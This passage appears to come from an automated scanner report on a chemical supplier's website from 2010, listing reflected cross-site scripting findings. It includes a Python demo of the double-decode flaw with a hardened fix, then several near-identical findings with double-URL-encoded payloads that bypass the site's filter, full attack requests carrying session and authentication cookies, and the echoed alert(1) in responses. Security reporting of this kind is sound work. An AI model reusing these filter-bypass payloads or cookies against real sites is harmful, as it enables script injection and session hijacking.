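    time, result is concatenated into a double-quoted JS string."""
    once = unquote(raw_segment)          # %2522 -> %22  (server decode)
    if not naive_filter_ok(once):        # %22 contains no '"': passes
        raise ValueError("blocked by filter")
    twice = unquote(once)                # %22 -> "      (application decode)
    return 'cmCreateErrorTag("Error 404 | %s%s","E404") ;' % (URL_PREFIX, twice)


def filter_blocks(raw_segment: str) -> bool:
    """True if the vulnerable path rejects this segment. A single-encoded
    quote is caught; the double-encoded one used in the report is not."""
    try:
        vulnerable_render(raw_segment)
    except ValueError:
        return True
    return False


def hardened_render(raw_segment: str) -> str:
    """Fix 1: no second decode. Fix 2: build the argument as a JSON string
    literal, additionally escaping '/' and '<' so the value can neither end
    the string nor the enclosing <script> block, whatever it contains."""
    once = unquote(raw_segment)
    literal = json.dumps("Error 404 | " + URL_PREFIX + once)
    literal = literal.replace("/", "\\/").replace("<", "\\u003c")
    return 'cmCreateErrorTag(%s,"E404") ;' % literal


def js_string_intact(js: str, marker: str) -> bool:
    """Retest check: walk the JavaScript up to the first occurrence of
    `marker` and report whether a double-quoted string literal is still
    open there. False means the echoed input terminated the string."""
    pos = js.find(marker)
    if pos < 0:
        raise ValueError("marker not present")
    in_string = False
    escaped = False
    for ch in js[:pos]:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
    return in_string


if __name__ == "__main__":
    vuln = vulnerable_render(RAW_PATH_SEGMENT)
    print(vuln)
    print("string intact:", js_string_intact(vuln, "alert"))   # False
    safe = hardened_render(RAW_PATH_SEGMENT)
    print(safe)
    print("string intact:", js_string_intact(safe, "alert"))   # True
```

js_string_intact is the check a retest would automate: fed the cmCreateErrorTag line from any response in this section with the marker "alert", it returns False because the string is already closed where the payload's alert(1) begins; fed the hardened output it returns True, for the double-encoded payload and for the single-encoded one alike, because json.dumps escapes the quote at output time rather than relying on the filter to spot it.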

Request

GET /etcadc0e%2522%253balert%25281%2529%252f%252f1839ef392e4/medialib/labware/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcadc0e";alert(1)//1839ef392e4/medialib/labware/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.354. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 907bb%2522%253balert%25281%2529%252f%252f27d0491ee8b was submitted in the REST URL parameter 2. This input was echoed as 907bb";alert(1)//27d0491ee8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib907bb%2522%253balert%25281%2529%252f%252f27d0491ee8b/labware/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib907bb";alert(1)//27d0491ee8b/labware/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.355. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fafe%2522%253balert%25281%2529%252f%252f27f04ac4f09 was submitted in the REST URL parameter 3. This input was echoed as 4fafe";alert(1)//27f04ac4f09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware4fafe%2522%253balert%25281%2529%252f%252f27f04ac4f09/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware4fafe";alert(1)//27f04ac4f09/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.356. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7411b%2522%253balert%25281%2529%252f%252f8ab030eadd2 was submitted in the REST URL parameter 4. This input was echoed as 7411b";alert(1)//8ab030eadd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons7411b%2522%253balert%25281%2529%252f%252f8ab030eadd2/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons7411b";alert(1)//8ab030eadd2/centrifugation","E404") ;
   </script>
...[SNIP]...

1.357. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306c%2522%253balert%25281%2529%252f%252fd0a39ec7393 was submitted in the REST URL parameter 5. This input was echoed as 7306c";alert(1)//d0a39ec7393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/centrifugation7306c%2522%253balert%25281%2529%252f%252fd0a39ec7393 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:52 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/centrifugation7306c";alert(1)//d0a39ec7393","E404") ;
   </script>
...[SNIP]...

1.358. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

